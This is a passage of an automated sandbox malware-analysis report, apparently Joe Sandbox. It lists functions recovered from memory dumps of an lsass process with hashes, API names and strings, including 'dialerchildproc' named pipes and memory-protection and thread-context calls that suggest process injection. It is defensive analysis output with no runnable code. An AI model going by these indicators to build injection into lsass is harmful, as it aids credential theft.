                                                              • API ID: Value$ErrorLast$Heap$AllocFree
                                                              • String ID:
                                                              • API String ID: 570795689-0
                                                              • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                              • Instruction ID: 4882f9c6545ddba956175daa0b1033055c58a1b9921f799def37e079ec50fdf9
                                                              • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                              • Instruction Fuzzy Hash: 754197603013C4D6FE68A73555DD36D2242AB44BB4F174B27ABBB077E7EE38886A4600
                                                              Function 00000202C0AE2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                              • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                              • API String ID: 2171963597-1373409510
                                                              • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                              • Instruction ID: a0d3f3940cedbe8f49a02ff4fcf1ce97ef5dd93de91068aee362f87148ae0ba9
                                                              • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                              • Instruction Fuzzy Hash: 31213832614B40C2FB208B25E48C75E67A5F789BA4F514217EB9A03BA9CF3DC54DCB00
                                                              Function 00000202C0AEA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 849930591-393685449
                                                              • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                              • Instruction ID: dc69ca82dc18b6d9c62c9d97f6a4348578a3add946f7b447ab90ca90604d3949
                                                              • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                              • Instruction Fuzzy Hash: 12E16A72600B80CAFB60DB65948C39D77A4F7A6B98F120117EFA957B97CB34D4A9C700
                                                              Function 00000202C0AB9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077444677.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ab0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 849930591-393685449
                                                              • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                              • Instruction ID: 181cfaa8d1e203509729981359315e3b225e44fdda2c096569e0a7ba0a0bf46d
                                                              • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                              • Instruction Fuzzy Hash: E5E17A72604B80CAFB60DB69D48839D7BA4F755B98F12011BEF8957B9ACB34C499C704
                                                              Function 00000202C0AEF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeLibraryProc
                                                              • String ID: api-ms-$ext-ms-
                                                              • API String ID: 3013587201-537541572
                                                              • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                              • Instruction ID: 26dcd2d441800ec49dab0db58e17c16847a3beddbc1f683c45a4dffa8db80317
                                                              • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                              • Instruction Fuzzy Hash: 2A41F422311B90D1FA16CB56A88C75E2395F748BA0F0A45279F6E877D6EE3DC45D8300
                                                              Function 00000202C0AE104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                              • String ID: d
                                                              • API String ID: 3743429067-2564639436
                                                              • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                              • Instruction ID: a80658ec44f4b8303e4c6cbc6e08df687ba0206d03e3ba62d1abb9220ce3f758
                                                              • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                              • Instruction Fuzzy Hash: B6415E73214B84C6F760CF21E48879E77A5F388B98F45822ADB8907B59DF39C599CB40
                                                              Function 00000202C0AED068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • FlsGetValue.KERNEL32(?,?,?,00000202C0AEC7DE,?,?,?,?,?,?,?,?,00000202C0AECF9D,?,?,00000001), ref: 00000202C0AED087
                                                              • FlsSetValue.KERNEL32(?,?,?,00000202C0AEC7DE,?,?,?,?,?,?,?,?,00000202C0AECF9D,?,?,00000001), ref: 00000202C0AED0A6
                                                              • FlsSetValue.KERNEL32(?,?,?,00000202C0AEC7DE,?,?,?,?,?,?,?,?,00000202C0AECF9D,?,?,00000001), ref: 00000202C0AED0CE
                                                              • FlsSetValue.KERNEL32(?,?,?,00000202C0AEC7DE,?,?,?,?,?,?,?,?,00000202C0AECF9D,?,?,00000001), ref: 00000202C0AED0DF
                                                              • FlsSetValue.KERNEL32(?,?,?,00000202C0AEC7DE,?,?,?,?,?,?,?,?,00000202C0AECF9D,?,?,00000001), ref: 00000202C0AED0F0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID: 1%$Y%
                                                              • API String ID: 3702945584-1395475152
                                                              • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                              • Instruction ID: 363b9827668d8b761d31e44ad5a3e4dbf29d2bfe1cda884ffc1cc8260375dec9
                                                              • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                              • Instruction Fuzzy Hash: D111AB607043C4C6FE68973555DD37D6141AB447F4F1A4727EAFA077DBDE28C86A8600
                                                              Function 00000202C0AE7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                              • String ID:
                                                              • API String ID: 190073905-0
                                                              • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction ID: 14979f1a24b322753f854ca5a4dead1d4ee237c3b69154d6c2c35d4c8e247c5d
                                                              • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction Fuzzy Hash: CE81F4617007C1C6FB54AB65A8CD39D2390BB85B84F174427EBE9477A7EB38CA6D8700
                                                              Function 00000202C0AE9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                              • String ID: api-ms-
                                                              • API String ID: 2559590344-2084034818
                                                              • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                              • Instruction ID: 93692ba9be4b391852265e8ab40df330be3080cd4f0ad2a801a0759650363b03
                                                              • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                              • Instruction Fuzzy Hash: A731A722212B80D1FE15DB42A48C75D2294B748BA0F5B49279FBE07792DF39C5AD8304
                                                              Function 00000202C0AF3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                              • String ID: CONOUT$
                                                              • API String ID: 3230265001-3130406586
                                                              • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                              • Instruction ID: b26ab6e85d4882431b05eb7ffbdc71b03f0f6e90507cbc4b46897213533c190b
                                                              • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                              • Instruction Fuzzy Hash: 91116D22314B40C6F7508B52E89C71D77A4F788FE8F154227EA5E877A6CF39C8188744
                                                              Function 00000202C0AE3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcessProtectVirtual$HandleModule
                                                              • String ID: wr
                                                              • API String ID: 1092925422-2678910430
                                                              • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                              • Instruction ID: bcb637cd16c44afa16a89db43d108bf5c410f3b34640b7b1e1fa2b494dd30d53
                                                              • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                              • Instruction Fuzzy Hash: E1115726304B81C2FB149B21E48C26D72B4FB88B85F06412BDF99037AAEF3EC509C704
                                                              Function 00000202C0AE5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Thread$Current$Context
                                                              • String ID:
                                                              • API String ID: 1666949209-0
                                                              • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                              • Instruction ID: dbc3b65819fd6533e59164d32a3bb8f97f2c88b353aa9b524f2c9543e34d3ae7
                                                              • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                              • Instruction Fuzzy Hash: 30D18776205B88C6EA70DB1AE49835E77A0F388B88F110517EADE47BA6DF3CC555CB40
                                                              Function 00000202C0AE2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocFree
                                                              • String ID: dialer
                                                              • API String ID: 756756679-3528709123
                                                              • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                              • Instruction ID: 539d7fa312dabe0a02a4a36991552fccd56336bf33b53f387f86ad28829e058b
                                                              • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                              • Instruction Fuzzy Hash: 18319D22701B91C2FA14CF16A98C72DA7A0FB44B84F0A41279F9847B67EF35C4B98740
                                                              Function 00000202C0AECFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast
                                                              • String ID:
                                                              • API String ID: 2506987500-0
                                                              • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                              • Instruction ID: c83c6b407707b4dbc6b3b7b82b2caed50328515e1eb0a43fe36386d7293909be
                                                              • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                              • Instruction Fuzzy Hash: 0A1163203013C0C6FE68A73555DD72D6242AB987F4F164727EAB7477E7EE68C86A8700
                                                              Function 00000202C0AE199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                              • String ID:
                                                              • API String ID: 517849248-0
                                                              • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                              • Instruction ID: c1f12f185a365d98643c548e91b1e72bf4effc7dbd05845da70183f29bcaf82d
                                                              • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                              • Instruction Fuzzy Hash: DD010532301B80C2FA649B52A89C75963A9B788FC4F894137DF9A43766DE39C989C740
                                                              Function 00000202C0AE36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                              • String ID:
                                                              • API String ID: 449555515-0
                                                              • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                              • Instruction ID: 164501a6415bffd66fe917e88f769ddc3ad1f1b40aa64bea97b79c9247d2f77e
                                                              • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                              • Instruction Fuzzy Hash: B5012DB6611B40C2FB249B21E88C71E73A4BB45B86F154527CF9907766EF3EC55C8704
                                                              Function 00000202C0AE8FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 2395640692-629598281
                                                              • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                              • Instruction ID: 4b0a6f3e062a47a2f3e77ad4f28d0830188973ba44af3f5408a27d7634b4296d
                                                              • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                              • Instruction Fuzzy Hash: 6751BF32201B81CAFB94CF15E88CB5D3795F344B88F528227DBA64774AEB35C859C708
                                                              Function 00000202C0AE3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: CombinePath
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3422762182-91387939
                                                              • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                              • Instruction ID: 748eaec06fdd8304175141e91d7fcb10eea3299cf276c1654e8c92baf0a6311d
                                                              • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                              • Instruction Fuzzy Hash: 6DF01C66718B84C2FA148B53B99C11D6665AB48FD0F0A9233EF5A4BB2ADF3DC45D8700
                                                              Function 00000202C0AEBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                              • Instruction ID: b1dae043e590163143f4e82ec39ab210fa29368e4bf0a17308b2a9fdf74dbffb
                                                              • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                              • Instruction Fuzzy Hash: 65F06262211B45C1FB108B24E8CC35E6360EB88765F55021BCB6A452F6DF3DC55C8700
                                                              Function 00000202C0AE50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread
                                                              • String ID:
                                                              • API String ID: 2882836952-0
                                                              • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                              • Instruction ID: cdd9b78ec5eaf04cb1b2f14923f4cedba8257b9bf05445ea44050982a578b50b
                                                              • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                              • Instruction Fuzzy Hash: 6C02A432219B84C6EB60CB55F49875EB7A1F384794F110117EBDE87BAADB78C498CB00
                                                              Function 00000202C0AE5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread
                                                              • String ID:
                                                              • API String ID: 2882836952-0
                                                              • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                              • Instruction ID: 76b413ec14e38a6ac9e88e25468b0616ac705ba1cdb0ca70ff7d6d8fad0dbab9
                                                              • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                              • Instruction Fuzzy Hash: 6061B676619B80C6F660CB15F48871E77A0F388794F110517EBDE47BAADB78C968CB40
                                                              Function 00000202C0AF4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: _set_statfp
                                                              • String ID:
                                                              • API String ID: 1156100317-0
                                                              • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction ID: aadaf6c08f9748136de9f6cbceaa287ca2a5a32013c1ebda6f4ef6558c209bf0
                                                              • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction Fuzzy Hash: EE119E23A10B54A9F7641568E8DE36D11406B683F8F0A0727AB76076EB8B2AC8CD424C
                                                              Function 00000202C0AC3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077444677.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ab0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: _set_statfp
                                                              • String ID:
                                                              • API String ID: 1156100317-0
                                                              • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction ID: 2438009d4eccd0bfdc5c9a2303f4341fa76b055f83bc79e43529a95e1e4287f6
                                                              • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction Fuzzy Hash: 5B112533A5CF09C9FAA42128E4CE37D10D07B59370F4B863BAB76163E7CA6AC84C4201
                                                              Function 00000202C0ABF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077444677.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ab0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                              • API String ID: 3215553584-4202648911
                                                              • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                              • Instruction ID: 26cf979074d90fcf05d85e544fcdcf7579b7cc95cef60043f929738aa5a5c4dc
                                                              • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                              • Instruction Fuzzy Hash: F2610536600760C6FA69DB69E5CC76E6AA0F789780F5B8917CB0A177A7DB34C84DC300
                                                              Function 00000202C0AEAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: CallEncodePointerTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3544855599-2084237596
                                                              • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction ID: 558256b13703980bb35bc78ab76fb44dce15fdc78b8fdb1fb2b32ce49efec02f
                                                              • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction Fuzzy Hash: 36614832600B84CAFB20DF65D48839D77A0F399B88F154217EF9917B9ADB78D5A9C700
                                                              Function 00000202C0AEAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 3896166516-3733052814
                                                              • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction ID: 97304d35c4b486749e002e92b9cf81982149fd581c5d11b448b14438c7f928ed
                                                              • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction Fuzzy Hash: 44514C721007C0CAFB648B2595CC35D77A0F766B95F1A4217DBE947B96CB38E4A9CB00
                                                              Function 00000202C0ABA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077444677.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ab0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 3896166516-3733052814
                                                              • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction ID: 19c43cd71e60161d93812c77d0e4ac8737510cff6eeb5711627b4654a467fa8f
                                                              • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction Fuzzy Hash: 44516D36104780CAFB748B25959C39C7BA0F365B94F1A8217DB998BBD7CB39D499C700
                                                              Function 00000202C0AB8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                              Download Yara Rule
